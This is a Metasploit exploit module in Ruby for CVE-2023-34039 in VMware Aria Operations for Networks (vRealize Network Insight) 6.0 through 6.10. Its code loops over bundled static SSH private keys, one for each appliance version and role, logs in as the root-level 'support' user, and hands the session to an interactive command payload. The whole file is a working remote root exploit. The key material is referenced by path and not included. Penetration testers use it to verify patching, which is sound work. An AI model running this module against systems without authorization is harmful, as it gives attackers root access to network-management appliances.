Path: blob/master/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

# Metasploit exploit module for CVE-2023-34039: the affected appliances ship
# with static, non-randomised SSH host keys, so a known private key
# authenticates as the "support" user over SSH.
#
# The module does not include the Tcp mixin; it relies on the Remote::SSH
# mixin for ssh_client_defaults and registers RHOST/RPORT itself (see
# register_options below). Declared side effect: IOC_IN_LOGS, i.e. the SSH
# login is expected to be visible in the target's authentication logs.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH

  Rank = ExcellentRanking

  # Module metadata and options.
  #
  # Each versioned target carries a 'key' path under the framework data
  # directory (exploits/CVE-2023-34039/). The 22 versioned entries occupy
  # indices 0-21; the 'All' entry is index 22, which is what 'DefaultTarget'
  # points at, so by default every bundled key is tried (see #exploit).
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',
          'Description' => %q{
            VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0
            do not randomize the SSH keys on virtual machine initialization. Since the key is easily
            retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.
          },
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Privileged' => true,
          'Targets' => [
            [ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],
            [ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],
            [ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],
            [ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],
            [ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],
            [ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],
            [ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],
            [ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],
            [ '6.4_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],
            [ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],
            [ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],
            [ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],
            [ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],
            [ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],
            [ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],
            [ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],
            [ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],
            [ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],
            [ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],
            [ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],
            [ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],
            [ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],
            [
              'All', {} # built later: #exploit collects the 'key' of every other target
            ],
          ],
          'Payload' => {
            'Compat' => {
              'PayloadType' => 'cmd_interact',
              'ConnectionType' => 'find'
            }
          },
          'Author' => [
            'h00die', # MSF module
            'SinSinology', # PoC
            'Harsh Jaiswal (@rootxharsh)', # Discovery
            'Rahul Maini (@iamnoooob)' # Discovery
          ],
          'License' => MSF_LICENSE,
          'References' => [
            ['CVE', '2023-34039'],
            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
          ],
          'DisclosureDate' => '2023-08-29',
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          # Index of the 'All' target above.
          'DefaultTarget' => 22,
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            # The SSH login leaves an entry in the target's logs.
            'SideEffects' => [IOC_IN_LOGS]
          }
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])
      ]
    )
  end

  # helper methods that normally come from Tcp

  # @return [String] the RHOST datastore value
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] the RPORT datastore value
  def rport
    datastore['RPORT']
  end

  # Attempts a public-key SSH login with a single in-memory private key.
  #
  # Only the 'publickey' auth method is offered; the key is passed as
  # key_data so nothing is written to disk. The whole negotiation is bounded
  # by SSH_TIMEOUT. Every expected failure mode is reported with print_error
  # and turned into a nil return rather than an exception, so the caller can
  # simply move on to the next key.
  #
  # @param user [String] SSH username to authenticate as
  # @param key_data [String] raw private key material
  # @return [Net::SSH::CommandStream, nil] an interactive stream over the
  #   authenticated connection, or nil if connection/negotiation/auth failed
  def do_login(user, key_data)
    opt_hash = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      port: rport,
      key_data: [ key_data ]
    })
    # :debug verbosity is very noisy; only enable it on explicit request.
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
    begin
      ssh_socket = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
      end
    rescue Rex::ConnectionError
      print_error "#{rhost}:#{rport} SSH - Unable to connect"
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    if ssh_socket
      # Wrap the authenticated connection in a CommandStream and drop our
      # local reference so the stream is the only owner of the socket.
      conn = Net::SSH::CommandStream.new(ssh_socket)
      ssh_socket = nil

      return conn
    end
    nil
  end

  # Tries the bundled key(s) for the selected target against the 'support'
  # user and hands any successful connection to the payload handler.
  #
  # With the 'All' target every other target's key is collected and tried in
  # declaration order; otherwise only the selected target's key is used. Keys
  # are read in binary mode from the data directory. STOP_ON_SUCCESS (default
  # true) ends the loop after the first working key; when it is false the
  # remaining keys are still attempted. If no key succeeds the method simply
  # returns; the per-key failures have already been reported by #do_login.
  #
  # @return [void]
  def exploit
    if target.name == 'All'
      keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }
    else
      keys = [target.opts['key']]
    end

    keys.each do |key|
      vprint_status("Attempting key: #{key}")
      key_data = File.read(key, mode: 'rb')
      conn = do_login('support', key_data)
      next unless conn

      print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"
      handler(conn.lsock)
      break if datastore['STOP_ON_SUCCESS']
    end
  end
end